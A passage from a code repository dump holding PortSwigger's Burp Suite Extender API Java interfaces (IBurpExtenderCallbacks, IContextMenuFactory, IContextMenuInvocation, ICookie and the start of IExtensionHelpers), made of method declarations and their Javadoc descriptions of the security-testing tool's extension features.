351 |
352 | /**
353 | * This method is used to register a custom Scanner check. When performing
354 | * scanning, Burp will ask the check to perform active or passive scanning
355 | * on the base request, and report any Scanner issues that are identified.
356 | *
357 | * @param check An object created by the extension that implements the
358 | * burp.IScannerCheck interface.
359 | */
360 | void registerScannerCheck(IScannerCheck check);
361 |
362 | /**
363 | * This method is used to retrieve the Scanner checks that are registered by
364 | * the extension.
365 | *
366 | * @return A list of Scanner checks that are currently registered by this
367 | * extension.
368 | */
369 | List getScannerChecks();
370 |
371 | /**
372 | * This method is used to remove a Scanner check that has been registered by
373 | * the extension.
374 | *
375 | * @param check The Scanner check to be removed.
376 | */
377 | void removeScannerCheck(IScannerCheck check);
378 |
379 | /**
380 | * This method is used to register a factory for Intruder payloads. Each
381 | * registered factory will be available within the Intruder UI for the user
382 | * to select as the payload source for an attack. When this is selected, the
383 | * factory will be asked to provide a new instance of an
384 | * burp.IIntruderPayloadGenerator object, which will be used to
385 | * generate payloads for the attack.
386 | *
387 | * @param factory An object created by the extension that implements the
388 | * burp.IIntruderPayloadGeneratorFactory interface.
389 | */
390 | void registerIntruderPayloadGeneratorFactory(
391 | IIntruderPayloadGeneratorFactory factory);
392 |
393 | /**
394 | * This method is used to retrieve the Intruder payload generator factories
395 | * that are registered by the extension.
396 | *
397 | * @return A list of Intruder payload generator factories that are currently
398 | * registered by this extension.
399 | */
400 | List
401 | getIntruderPayloadGeneratorFactories();
402 |
403 | /**
404 | * This method is used to remove an Intruder payload generator factory that
405 | * has been registered by the extension.
406 | *
407 | * @param factory The Intruder payload generator factory to be removed.
408 | */
409 | void removeIntruderPayloadGeneratorFactory(
410 | IIntruderPayloadGeneratorFactory factory);
411 |
412 | /**
413 | * This method is used to register a custom Intruder payload processor. Each
414 | * registered processor will be available within the Intruder UI for the
415 | * user to select as the action for a payload processing rule.
416 | *
417 | * @param processor An object created by the extension that implements the
418 | * burp.IIntruderPayloadProcessor interface.
419 | */
420 | void registerIntruderPayloadProcessor(IIntruderPayloadProcessor processor);
421 |
422 | /**
423 | * This method is used to retrieve the Intruder payload processors that are
424 | * registered by the extension.
425 | *
426 | * @return A list of Intruder payload processors that are currently
427 | * registered by this extension.
428 | */
429 | List getIntruderPayloadProcessors();
430 |
431 | /**
432 | * This method is used to remove an Intruder payload processor that has been
433 | * registered by the extension.
434 | *
435 | * @param processor The Intruder payload processor to be removed.
436 | */
437 | void removeIntruderPayloadProcessor(IIntruderPayloadProcessor processor);
438 |
439 | /**
440 | * This method is used to register a custom session handling action. Each
441 | * registered action will be available within the session handling rule UI
442 | * for the user to select as a rule action. Users can choose to invoke an
443 | * action directly in its own right, or following execution of a macro.
444 | *
445 | * @param action An object created by the extension that implements the
446 | * burp.ISessionHandlingAction interface.
447 | */
448 | void registerSessionHandlingAction(ISessionHandlingAction action);
449 |
450 | /**
451 | * This method is used to retrieve the session handling actions that are
452 | * registered by the extension.
453 | *
454 | * @return A list of session handling actions that are currently registered
455 | * by this extension.
456 | */
457 | List getSessionHandlingActions();
458 |
459 | /**
460 | * This method is used to remove a session handling action that has been
461 | * registered by the extension.
462 | *
463 | * @param action The extension session handling action to be removed.
464 | */
465 | void removeSessionHandlingAction(ISessionHandlingAction action);
466 |
467 | /**
468 | * This method is used to unload the extension from Burp Suite.
469 | */
470 | void unloadExtension();
471 |
472 | /**
473 | * This method is used to add a custom tab to the main Burp Suite window.
474 | *
475 | * @param tab An object created by the extension that implements the
476 | * burp.ITab interface.
477 | */
478 | void addSuiteTab(ITab tab);
479 |
480 | /**
481 | * This method is used to remove a previously-added tab from the main Burp
482 | * Suite window.
483 | *
484 | * @param tab An object created by the extension that implements the
485 | * burp.ITab interface.
486 | */
487 | void removeSuiteTab(ITab tab);
488 |
489 | /**
490 | * This method is used to customize UI components in line with Burp's UI
491 | * style, including font size, colors, table line spacing, etc. The action
492 | * is performed recursively on any child components of the passed-in
493 | * component.
494 | *
495 | * @param component The UI component to be customized.
496 | */
497 | void customizeUiComponent(Component component);
498 |
499 | /**
500 | * This method is used to create a new instance of Burp's HTTP message
501 | * editor, for the extension to use in its own UI.
502 | *
503 | * @param controller An object created by the extension that implements the
504 | * burp.IMessageEditorController interface. This parameter is
505 | * optional and may be null. If it is provided, then the
506 | * message editor will query the controller when required to obtain details
507 | * about the currently displayed message, including the
508 | * burp.IHttpService for the message, and the associated request or
509 | * response message. If a controller is not provided, then the message
510 | * editor will not support context menu actions, such as sending requests to
511 | * other Burp tools.
512 | * @param editable Indicates whether the editor created should be editable,
513 | * or used only for message viewing.
514 | * @return An object that implements the burp.IMessageEditor
515 | * interface, and which the extension can use in its own UI.
516 | */
517 | IMessageEditor createMessageEditor(IMessageEditorController controller,
518 | boolean editable);
519 |
520 | /**
521 | * This method returns the command line arguments that were passed to Burp
522 | * on startup.
523 | *
524 | * @return The command line arguments that were passed to Burp on startup.
525 | */
526 | String[] getCommandLineArguments();
527 |
528 | /**
529 | * This method is used to save configuration settings for the extension in a
530 | * persistent way that survives reloads of the extension and of Burp Suite.
531 | * Saved settings can be retrieved using the method
532 | * loadExtensionSetting().
533 | *
534 | * @param name The name of the setting.
535 | * @param value The value of the setting. If this value is null
536 | * then any existing setting with the specified name will be removed.
537 | */
538 | void saveExtensionSetting(String name, String value);
539 |
540 | /**
541 | * This method is used to load configuration settings for the extension that
542 | * were saved using the method
543 | * saveExtensionSetting().
544 | *
545 | * @param name The name of the setting.
546 | * @return The value of the setting, or null if no value is
547 | * set.
548 | */
549 | String loadExtensionSetting(String name);
550 |
551 | /**
552 | * This method is used to create a new instance of Burp's plain text editor,
553 | * for the extension to use in its own UI.
554 | *
555 | * @return An object that implements the burp.ITextEditor interface,
556 | * and which the extension can use in its own UI.
557 | */
558 | ITextEditor createTextEditor();
559 |
560 | /**
561 | * This method can be used to send an HTTP request to the Burp Repeater
562 | * tool. The request will be displayed in the user interface, but will not
563 | * be issued until the user initiates this action.
564 | *
565 | * @param host The hostname of the remote HTTP server.
566 | * @param port The port of the remote HTTP server.
567 | * @param useHttps Flags whether the protocol is HTTPS or HTTP.
568 | * @param request The full HTTP request.
569 | * @param tabCaption An optional caption which will appear on the Repeater
570 | * tab containing the request. If this value is null then a
571 | * default tab index will be displayed.
572 | */
573 | void sendToRepeater(
574 | String host,
575 | int port,
576 | boolean useHttps,
577 | byte[] request,
578 | String tabCaption);
579 |
580 | /**
581 | * This method can be used to send an HTTP request to the Burp Intruder
582 | * tool. The request will be displayed in the user interface, and markers
583 | * for attack payloads will be placed into default locations within the
584 | * request.
585 | *
586 | * @param host The hostname of the remote HTTP server.
587 | * @param port The port of the remote HTTP server.
588 | * @param useHttps Flags whether the protocol is HTTPS or HTTP.
589 | * @param request The full HTTP request.
590 | */
591 | void sendToIntruder(
592 | String host,
593 | int port,
594 | boolean useHttps,
595 | byte[] request);
596 |
597 | /**
598 | * This method can be used to send an HTTP request to the Burp Intruder
599 | * tool. The request will be displayed in the user interface, and markers
600 | * for attack payloads will be placed into the specified locations within
601 | * the request.
602 | *
603 | * @param host The hostname of the remote HTTP server.
604 | * @param port The port of the remote HTTP server.
605 | * @param useHttps Flags whether the protocol is HTTPS or HTTP.
606 | * @param request The full HTTP request.
607 | * @param payloadPositionOffsets A list of index pairs representing the
608 | * payload positions to be used. Each item in the list must be an int[2]
609 | * array containing the start and end offsets for the payload position.
610 | */
611 | void sendToIntruder(
612 | String host,
613 | int port,
614 | boolean useHttps,
615 | byte[] request,
616 | List payloadPositionOffsets);
617 |
618 | /**
619 | * This method can be used to send data to the Comparer tool.
620 | *
621 | * @param data The data to be sent to Comparer.
622 | */
623 | void sendToComparer(byte[] data);
624 |
625 | /**
626 | * This method can be used to send a seed URL to the Burp Spider tool. If
627 | * the URL is not within the current Spider scope, the user will be asked if
628 | * they wish to add the URL to the scope. If the Spider is not currently
629 | * running, it will be started. The seed URL will be requested, and the
630 | * Spider will process the application's response in the normal way.
631 | *
632 | * @param url The new seed URL to begin spidering from.
633 | */
634 | void sendToSpider(
635 | java.net.URL url);
636 |
637 | /**
638 | * This method can be used to send an HTTP request to the Burp Scanner tool
639 | * to perform an active vulnerability scan. If the request is not within the
640 | * current active scanning scope, the user will be asked if they wish to
641 | * proceed with the scan.
642 | *
643 | * @param host The hostname of the remote HTTP server.
644 | * @param port The port of the remote HTTP server.
645 | * @param useHttps Flags whether the protocol is HTTPS or HTTP.
646 | * @param request The full HTTP request.
647 | * @return The resulting scan queue item.
648 | */
649 | IScanQueueItem doActiveScan(
650 | String host,
651 | int port,
652 | boolean useHttps,
653 | byte[] request);
654 |
655 | /**
656 | * This method can be used to send an HTTP request to the Burp Scanner tool
657 | * to perform an active vulnerability scan, based on a custom list of
658 | * insertion points that are to be scanned. If the request is not within the
659 | * current active scanning scope, the user will be asked if they wish to
660 | * proceed with the scan.
661 | *
662 | * @param host The hostname of the remote HTTP server.
663 | * @param port The port of the remote HTTP server.
664 | * @param useHttps Flags whether the protocol is HTTPS or HTTP.
665 | * @param request The full HTTP request.
666 | * @param insertionPointOffsets A list of index pairs representing the
667 | * positions of the insertion points that should be scanned. Each item in
668 | * the list must be an int[2] array containing the start and end offsets for
669 | * the insertion point.
670 | * @return The resulting scan queue item.
671 | */
672 | IScanQueueItem doActiveScan(
673 | String host,
674 | int port,
675 | boolean useHttps,
676 | byte[] request,
677 | List insertionPointOffsets);
678 |
679 | /**
680 | * This method can be used to send an HTTP request to the Burp Scanner tool
681 | * to perform a passive vulnerability scan.
682 | *
683 | * @param host The hostname of the remote HTTP server.
684 | * @param port The port of the remote HTTP server.
685 | * @param useHttps Flags whether the protocol is HTTPS or HTTP.
686 | * @param request The full HTTP request.
687 | * @param response The full HTTP response.
688 | */
689 | void doPassiveScan(
690 | String host,
691 | int port,
692 | boolean useHttps,
693 | byte[] request,
694 | byte[] response);
695 |
696 | /**
697 | * This method can be used to issue HTTP requests and retrieve their
698 | * responses.
699 | *
700 | * @param httpService The HTTP service to which the request should be sent.
701 | * @param request The full HTTP request.
702 | * @return An object that implements the burp.IHttpRequestResponse
703 | * interface, and which the extension can query to obtain the details of the
704 | * response.
705 | */
706 | IHttpRequestResponse makeHttpRequest(IHttpService httpService,
707 | byte[] request);
708 |
709 | /**
710 | * This method can be used to issue HTTP requests and retrieve their
711 | * responses.
712 | *
713 | * @param host The hostname of the remote HTTP server.
714 | * @param port The port of the remote HTTP server.
715 | * @param useHttps Flags whether the protocol is HTTPS or HTTP.
716 | * @param request The full HTTP request.
717 | * @return The full response retrieved from the remote server.
718 | */
719 | byte[] makeHttpRequest(
720 | String host,
721 | int port,
722 | boolean useHttps,
723 | byte[] request);
724 |
725 | /**
726 | * This method can be used to query whether a specified URL is within the
727 | * current Suite-wide scope.
728 | *
729 | * @param url The URL to query.
730 | * @return Returns true if the URL is within the current
731 | * Suite-wide scope.
732 | */
733 | boolean isInScope(java.net.URL url);
734 |
735 | /**
736 | * This method can be used to include the specified URL in the Suite-wide
737 | * scope.
738 | *
739 | * @param url The URL to include in the Suite-wide scope.
740 | */
741 | void includeInScope(java.net.URL url);
742 |
743 | /**
744 | * This method can be used to exclude the specified URL from the Suite-wide
745 | * scope.
746 | *
747 | * @param url The URL to exclude from the Suite-wide scope.
748 | */
749 | void excludeFromScope(java.net.URL url);
750 |
751 | /**
752 | * This method can be used to display a specified message in the Burp Suite
753 | * alerts tab.
754 | *
755 | * @param message The alert message to display.
756 | */
757 | void issueAlert(String message);
758 |
759 | /**
760 | * This method returns details of all items in the Proxy history.
761 | *
762 | * @return The contents of the Proxy history.
763 | */
764 | IHttpRequestResponse[] getProxyHistory();
765 |
766 | /**
767 | * This method returns details of items in the site map.
768 | *
769 | * @param urlPrefix This parameter can be used to specify a URL prefix, in
770 | * order to extract a specific subset of the site map. The method performs a
771 | * simple case-sensitive text match, returning all site map items whose URL
772 | * begins with the specified prefix. If this parameter is null, the entire
773 | * site map is returned.
774 | *
775 | * @return Details of items in the site map.
776 | */
777 | IHttpRequestResponse[] getSiteMap(String urlPrefix);
778 |
779 | /**
780 | * This method returns all of the current scan issues for URLs matching the
781 | * specified literal prefix.
782 | *
783 | * @param urlPrefix This parameter can be used to specify a URL prefix, in
784 | * order to extract a specific subset of scan issues. The method performs a
785 | * simple case-sensitive text match, returning all scan issues whose URL
786 | * begins with the specified prefix. If this parameter is null, all issues
787 | * are returned.
788 | * @return Details of the scan issues.
789 | */
790 | IScanIssue[] getScanIssues(String urlPrefix);
791 |
792 | /**
793 | * This method is used to generate a report for the specified Scanner
794 | * issues. The report format can be specified. For all other reporting
795 | * options, the default settings that appear in the reporting UI wizard are
796 | * used.
797 | *
798 | * @param format The format to be used in the report. Accepted values are
799 | * HTML and XML.
800 | * @param issues The Scanner issues to be reported.
801 | * @param file The file to which the report will be saved.
802 | */
803 | void generateScanReport(String format, IScanIssue[] issues,
804 | java.io.File file);
805 |
806 | /**
807 | * This method is used to retrieve the contents of Burp's session handling
808 | * cookie jar. Extensions that provide an
809 | * burp.ISessionHandlingAction can query and update the cookie jar
810 | * in order to handle unusual session handling mechanisms.
811 | *
812 | * @return A list of burp.ICookie objects representing the contents
813 | * of Burp's session handling cookie jar.
814 | */
815 | List getCookieJarContents();
816 |
817 | /**
818 | * This method is used to update the contents of Burp's session handling
819 | * cookie jar. Extensions that provide an
820 | * burp.ISessionHandlingAction can query and update the cookie jar
821 | * in order to handle unusual session handling mechanisms.
822 | *
823 | * @param cookie An burp.ICookie object containing details of the
824 | * cookie to be updated. If the cookie jar already contains a cookie that
825 | * matches the specified domain and name, then that cookie will be updated
826 | * with the new value and expiration, unless the new value is
827 | * null, in which case the cookie will be removed. If the
828 | * cookie jar does not already contain a cookie that matches the specified
829 | * domain and name, then the cookie will be added.
830 | */
831 | void updateCookieJar(ICookie cookie);
832 |
833 | /**
834 | * This method can be used to add an item to Burp's site map with the
835 | * specified request/response details. This will overwrite the details of
836 | * any existing matching item in the site map.
837 | *
838 | * @param item Details of the item to be added to the site map
839 | */
840 | void addToSiteMap(IHttpRequestResponse item);
841 |
842 | /**
843 | * This method can be used to restore Burp's state from a specified saved
844 | * state file. This method blocks until the restore operation is completed,
845 | * and must not be called from the event dispatch thread.
846 | *
847 | * @param file The file containing Burp's saved state.
848 | */
849 | void restoreState(java.io.File file);
850 |
851 | /**
852 | * This method can be used to save Burp's state to a specified file. This
853 | * method blocks until the save operation is completed, and must not be
854 | * called from the event dispatch thread.
855 | *
856 | * @param file The file to save Burp's state in.
857 | */
858 | void saveState(java.io.File file);
859 |
860 | /**
861 | * This method causes Burp to save all of its current configuration as a Map
862 | * of name/value Strings.
863 | *
864 | * @return A Map of name/value Strings reflecting Burp's current
865 | * configuration.
866 | */
867 | Map saveConfig();
868 |
869 | /**
870 | * This method causes Burp to load a new configuration from the Map of
871 | * name/value Strings provided. Any settings not specified in the Map will
872 | * be restored to their default values. To selectively update only some
873 | * settings and leave the rest unchanged, you should first call
874 | * saveConfig() to obtain Burp's current configuration, modify
875 | * the relevant items in the Map, and then call
876 | * loadConfig() with the same Map.
877 | *
878 | * @param config A map of name/value Strings to use as Burp's new
879 | * configuration.
880 | */
881 | void loadConfig(Map config);
882 |
883 | /**
884 | * This method sets the master interception mode for Burp Proxy.
885 | *
886 | * @param enabled Indicates whether interception of Proxy messages should be
887 | * enabled.
888 | */
889 | void setProxyInterceptionEnabled(boolean enabled);
890 |
891 | /**
892 | * This method retrieves information about the version of Burp in which the
893 | * extension is running. It can be used by extensions to dynamically adjust
894 | * their behavior depending on the functionality and APIs supported by the
895 | * current version.
896 | *
897 | * @return An array of Strings comprised of: the product name (e.g. Burp
898 | * Suite Professional), the major version (e.g. 1.5), the minor version
899 | * (e.g. 03)
900 | */
901 | String[] getBurpVersion();
902 |
903 | /**
904 | * This method retrieves the absolute path name of the file from which the
905 | * current extension was loaded.
906 | *
907 | * @return The absolute path name of the file from which the current
908 | * extension was loaded.
909 | */
910 | String getExtensionFilename();
911 |
912 | /**
913 | * This method determines whether the current extension was loaded as a
914 | * BApp (a Burp App from the BApp Store).
915 | *
916 | * @return Returns true if the current extension was loaded as a BApp.
917 | */
918 | boolean isExtensionBapp();
919 |
920 | /**
921 | * This method can be used to shut down Burp programmatically, with an
922 | * optional prompt to the user. If the method returns, the user canceled the
923 | * shutdown prompt.
924 | *
925 | * @param promptUser Indicates whether to prompt the user to confirm the
926 | * shutdown.
927 | */
928 | void exitSuite(boolean promptUser);
929 |
930 | /**
931 | * This method is used to create a temporary file on disk containing the
932 | * provided data. Extensions can use temporary files for long-term storage
933 | * of runtime data, avoiding the need to retain that data in memory.
934 | *
935 | * @param buffer The data to be saved to a temporary file.
936 | * @return An object that implements the burp.ITempFile interface.
937 | */
938 | ITempFile saveToTempFile(byte[] buffer);
939 |
940 | /**
941 | * This method is used to save the request and response of an
942 | * burp.IHttpRequestResponse object to temporary files, so that they
943 | * are no longer held in memory. Extensions can used this method to convert
944 | * burp.IHttpRequestResponse objects into a form suitable for
945 | * long-term storage.
946 | *
947 | * @param httpRequestResponse The burp.IHttpRequestResponse object
948 | * whose request and response messages are to be saved to temporary files.
949 | * @return An object that implements the
950 | * burp.IHttpRequestResponsePersisted interface.
951 | */
952 | IHttpRequestResponsePersisted saveBuffersToTempFiles(
953 | IHttpRequestResponse httpRequestResponse);
954 |
955 | /**
956 | * This method is used to apply markers to an HTTP request or response, at
957 | * offsets into the message that are relevant for some particular purpose.
958 | * Markers are used in various situations, such as specifying Intruder
959 | * payload positions, Scanner insertion points, and highlights in Scanner
960 | * issues.
961 | *
962 | * @param httpRequestResponse The burp.IHttpRequestResponse object
963 | * to which the markers should be applied.
964 | * @param requestMarkers A list of index pairs representing the offsets of
965 | * markers to be applied to the request message. Each item in the list must
966 | * be an int[2] array containing the start and end offsets for the marker.
967 | * The markers in the list should be in sequence and not overlapping. This
968 | * parameter is optional and may be null if no request markers
969 | * are required.
970 | * @param responseMarkers A list of index pairs representing the offsets of
971 | * markers to be applied to the response message. Each item in the list must
972 | * be an int[2] array containing the start and end offsets for the marker.
973 | * The markers in the list should be in sequence and not overlapping. This
974 | * parameter is optional and may be null if no response markers
975 | * are required.
976 | * @return An object that implements the
977 | * burp.IHttpRequestResponseWithMarkers interface.
978 | */
979 | IHttpRequestResponseWithMarkers applyMarkers(
980 | IHttpRequestResponse httpRequestResponse,
981 | List requestMarkers,
982 | List responseMarkers);
983 |
984 | /**
985 | * This method is used to obtain the descriptive name for the Burp tool
986 | * identified by the tool flag provided.
987 | *
988 | * @param toolFlag A flag identifying a Burp tool ( TOOL_PROXY,
989 | * TOOL_SCANNER, etc.). Tool flags are defined within this
990 | * interface.
991 | * @return The descriptive name for the specified tool.
992 | */
993 | String getToolName(int toolFlag);
994 |
995 | /**
996 | * This method is used to register a new Scanner issue. Note:
997 | * Wherever possible, extensions should implement custom Scanner checks
998 | * using
999 | * burp.IScannerCheck and report issues via those checks, so as to
1000 | * integrate with Burp's user-driven workflow, and ensure proper
1001 | * consolidation of duplicate reported issues. This method is only designed
1002 | * for tasks outside of the normal testing workflow, such as importing
1003 | * results from other scanning tools.
1004 | *
1005 | * @param issue An object created by the extension that implements the
1006 | * burp.IScanIssue interface.
1007 | */
1008 | void addScanIssue(IScanIssue issue);
1009 |
1010 | /**
1011 | * This method parses the specified request and returns details of each
1012 | * request parameter.
1013 | *
1014 | * @param request The request to be parsed.
1015 | * @return An array of: String[] { name, value, type }
1016 | * containing details of the parameters contained within the request.
1017 | * @deprecated Use burp.IExtensionHelpers.analyzeRequest() instead.
1018 | */
1019 | @Deprecated
1020 | String[][] getParameters(byte[] request);
1021 |
1022 | /**
1023 | * This method parses the specified request and returns details of each HTTP
1024 | * header.
1025 | *
1026 | * @param message The request to be parsed.
1027 | * @return An array of HTTP headers.
1028 | * @deprecated Use burp.IExtensionHelpers.analyzeRequest() or
1029 | * burp.IExtensionHelpers.analyzeResponse() instead.
1030 | */
1031 | @Deprecated
1032 | String[] getHeaders(byte[] message);
1033 |
1034 | /**
1035 | * This method can be used to register a new menu item which will appear on
1036 | * the various context menus that are used throughout Burp Suite to handle
1037 | * user-driven actions.
1038 | *
1039 | * @param menuItemCaption The caption to be displayed on the menu item.
1040 | * @param menuItemHandler The handler to be invoked when the user clicks on
1041 | * the menu item.
1042 | * @deprecated Use registerContextMenuFactory() instead.
1043 | */
1044 | @Deprecated
1045 | void registerMenuItem(
1046 | String menuItemCaption,
1047 | IMenuItemHandler menuItemHandler);
1048 | }
1049 |
--------------------------------------------------------------------------------
/src/main/java/burp/IContextMenuFactory.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IContextMenuFactory.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.util.List;
11 | import javax.swing.JMenuItem;
12 |
13 | /**
14 | * Extensions can implement this interface and then call
15 | * burp.IBurpExtenderCallbacks.registerContextMenuFactory() to register
16 | * a factory for custom context menu items.
17 | */
18 | public interface IContextMenuFactory
19 | {
20 | /**
21 | * This method will be called by Burp when the user invokes a context menu
22 | * anywhere within Burp. The factory can then provide any custom context
23 | * menu items that should be displayed in the context menu, based on the
24 | * details of the menu invocation.
25 | *
26 | * @param invocation An object that implements the
27 | * burp.IMessageEditorTabFactory interface, which the extension can
28 | * query to obtain details of the context menu invocation.
29 | * @return A list of custom menu items (which may include sub-menus,
30 | * checkbox menu items, etc.) that should be displayed. Extensions may
31 | * return
32 | * null from this method, to indicate that no menu items are
33 | * required.
34 | */
35 | List createMenuItems(IContextMenuInvocation invocation);
36 | }
37 |
--------------------------------------------------------------------------------
/src/main/java/burp/IContextMenuInvocation.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IContextMenuInvocation.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.awt.event.InputEvent;
11 |
12 | /**
13 | * This interface is used when Burp calls into an extension-provided
14 | * burp.IContextMenuFactory with details of a context menu invocation.
15 | * The custom context menu factory can query this interface to obtain details of
16 | * the invocation event, in order to determine what menu items should be
17 | * displayed.
18 | */
19 | public interface IContextMenuInvocation
20 | {
21 | /**
22 | * Used to indicate that the context menu is being invoked in a request
23 | * editor.
24 | */
25 | static final byte CONTEXT_MESSAGE_EDITOR_REQUEST = 0;
26 | /**
27 | * Used to indicate that the context menu is being invoked in a response
28 | * editor.
29 | */
30 | static final byte CONTEXT_MESSAGE_EDITOR_RESPONSE = 1;
31 | /**
32 | * Used to indicate that the context menu is being invoked in a non-editable
33 | * request viewer.
34 | */
35 | static final byte CONTEXT_MESSAGE_VIEWER_REQUEST = 2;
36 | /**
37 | * Used to indicate that the context menu is being invoked in a non-editable
38 | * response viewer.
39 | */
40 | static final byte CONTEXT_MESSAGE_VIEWER_RESPONSE = 3;
41 | /**
42 | * Used to indicate that the context menu is being invoked in the Target
43 | * site map tree.
44 | */
45 | static final byte CONTEXT_TARGET_SITE_MAP_TREE = 4;
46 | /**
47 | * Used to indicate that the context menu is being invoked in the Target
48 | * site map table.
49 | */
50 | static final byte CONTEXT_TARGET_SITE_MAP_TABLE = 5;
51 | /**
52 | * Used to indicate that the context menu is being invoked in the Proxy
53 | * history.
54 | */
55 | static final byte CONTEXT_PROXY_HISTORY = 6;
56 | /**
57 | * Used to indicate that the context menu is being invoked in the Scanner
58 | * results.
59 | */
60 | static final byte CONTEXT_SCANNER_RESULTS = 7;
61 | /**
62 | * Used to indicate that the context menu is being invoked in the Intruder
63 | * payload positions editor.
64 | */
65 | static final byte CONTEXT_INTRUDER_PAYLOAD_POSITIONS = 8;
66 | /**
67 | * Used to indicate that the context menu is being invoked in an Intruder
68 | * attack results.
69 | */
70 | static final byte CONTEXT_INTRUDER_ATTACK_RESULTS = 9;
71 | /**
72 | * Used to indicate that the context menu is being invoked in a search
73 | * results window.
74 | */
75 | static final byte CONTEXT_SEARCH_RESULTS = 10;
76 |
77 | /**
78 | * This method can be used to retrieve the native Java input event that was
79 | * the trigger for the context menu invocation.
80 | *
81 | * @return The InputEvent that was the trigger for the context
82 | * menu invocation.
83 | */
84 | InputEvent getInputEvent();
85 |
86 | /**
87 | * This method can be used to retrieve the Burp tool within which the
88 | * context menu was invoked.
89 | *
90 | * @return A flag indicating the Burp tool within which the context menu was
91 | * invoked. Burp tool flags are defined in the
92 | * burp.IBurpExtenderCallbacks interface.
93 | */
94 | int getToolFlag();
95 |
96 | /**
97 | * This method can be used to retrieve the context within which the menu was
98 | * invoked.
99 | *
100 | * @return An index indicating the context within which the menu was
101 | * invoked. The indices used are defined within this interface.
102 | */
103 | byte getInvocationContext();
104 |
105 | /**
106 | * This method can be used to retrieve the bounds of the user's selection
107 | * into the current message, if applicable.
108 | *
109 | * @return An int[2] array containing the start and end offsets of the
110 | * user's selection in the current message. If the user has not made any
111 | * selection in the current message, both offsets indicate the position of
112 | * the caret within the editor. If the menu is not being invoked from a
113 | * message editor, the method returns null.
114 | */
115 | int[] getSelectionBounds();
116 |
117 | /**
118 | * This method can be used to retrieve details of the HTTP requests /
119 | * responses that were shown or selected by the user when the context menu
120 | * was invoked.
121 | *
122 | * Note: For performance reasons, the objects returned from this
123 | * method are tied to the originating context of the messages within the
124 | * Burp UI. For example, if a context menu is invoked on the Proxy intercept
125 | * panel, then the
126 | * burp.IHttpRequestResponse returned by this method will reflect
127 | * the current contents of the interception panel, and this will change when
128 | * the current message has been forwarded or dropped. If your extension
129 | * needs to store details of the message for which the context menu has been
130 | * invoked, then you should query those details from the
131 | * burp.IHttpRequestResponse at the time of invocation, or you
132 | * should use
133 | * burp.IBurpExtenderCallbacks.saveBuffersToTempFiles() to create a
134 | * persistent read-only copy of the
135 | * burp.IHttpRequestResponse.
136 | *
137 | * @return An array of burp.IHttpRequestResponse objects
138 | * representing the items that were shown or selected by the user when the
139 | * context menu was invoked. This method returns null if no
140 | * messages are applicable to the invocation.
141 | */
142 | IHttpRequestResponse[] getSelectedMessages();
143 |
144 | /**
145 | * This method can be used to retrieve details of the Scanner issues that
146 | * were selected by the user when the context menu was invoked.
147 | *
148 | * @return An array of burp.IScanIssue objects representing the
149 | * issues that were selected by the user when the context menu was invoked.
150 | * This method returns null if no Scanner issues are applicable
151 | * to the invocation.
152 | */
153 | IScanIssue[] getSelectedIssues();
154 | }
155 |
--------------------------------------------------------------------------------
/src/main/java/burp/ICookie.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.ICookie.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.util.Date;
11 |
12 | /**
13 | * This interface is used to hold details about an HTTP cookie.
14 | */
15 | public interface ICookie
16 | {
17 | /**
18 | * This method is used to retrieve the domain for which the cookie is in
19 | * scope.
20 | *
21 | * @return The domain for which the cookie is in scope. Note: For
22 | * cookies that have been analyzed from responses (by calling
23 | * burp.IExtensionHelpers.analyzeResponse() and then
24 | * burp.IResponseInfo.getCookies(), the domain will be
25 | * null if the response did not explicitly set a domain
26 | * attribute for the cookie.
27 | */
28 | String getDomain();
29 |
30 | /**
31 | * This method is used to retrieve the path for which the cookie is in
32 | * scope.
33 | *
34 | * @return The path for which the cookie is in scope or null if none is set.
35 | */
36 | String getPath();
37 |
38 | /**
39 | * This method is used to retrieve the expiration time for the cookie.
40 | *
41 | * @return The expiration time for the cookie, or
42 | * null if none is set (i.e., for non-persistent session
43 | * cookies).
44 | */
45 | Date getExpiration();
46 |
47 | /**
48 | * This method is used to retrieve the name of the cookie.
49 | *
50 | * @return The name of the cookie.
51 | */
52 | String getName();
53 |
54 | /**
55 | * This method is used to retrieve the value of the cookie.
56 | * @return The value of the cookie.
57 | */
58 | String getValue();
59 | }
60 |
--------------------------------------------------------------------------------
/src/main/java/burp/IExtensionHelpers.java:
--------------------------------------------------------------------------------
1 | package burp;/*
2 | * @(#)burp.IExtensionHelpers.java
3 | *
4 | * Copyright PortSwigger Ltd. All rights reserved.
5 | *
6 | * This code may be used to extend the functionality of Burp Suite Free Edition
7 | * and Burp Suite Professional, provided that this usage does not violate the
8 | * license terms for those products.
9 | */
10 | import java.net.URL;
11 | import java.util.List;
12 |
13 | /**
14 | * This interface contains a number of helper methods, which extensions can use
15 | * to assist with various common tasks that arise for Burp extensions.
16 | *
17 | * Extensions can call
18 | * burp.IBurpExtenderCallbacks.getHelpers to obtain an instance of this
19 | * interface.
20 | */
21 | public interface IExtensionHelpers
22 | {
23 | /**
24 | * This method can be used to analyze an HTTP request, and obtain various
25 | * key details about it.
26 | *
27 | * @param request An
28 | * burp.IHttpRequestResponse object containing the request to be
29 | * analyzed.
30 | * @return An
31 | * burp.IRequestInfo object that can be queried to obtain details
32 | * about the request.
33 | */
34 | IRequestInfo analyzeRequest(IHttpRequestResponse request);
35 |
36 | /**
37 | * This method can be used to analyze an HTTP request, and obtain various
38 | * key details about it.
39 | *
40 | * @param httpService The HTTP service associated with the request. This is
41 | * optional and may be
42 | * null, in which case the resulting
43 | * burp.IRequestInfo object will not include the full request URL.
44 | * @param request The request to be analyzed.
45 | * @return An
46 | * burp.IRequestInfo object that can be queried to obtain details
47 | * about the request.
48 | */
49 | IRequestInfo analyzeRequest(IHttpService httpService, byte[] request);
50 |
51 | /**
52 | * This method can be used to analyze an HTTP request, and obtain various
53 | * key details about it. The resulting
54 | * burp.IRequestInfo object will not include the full request URL.
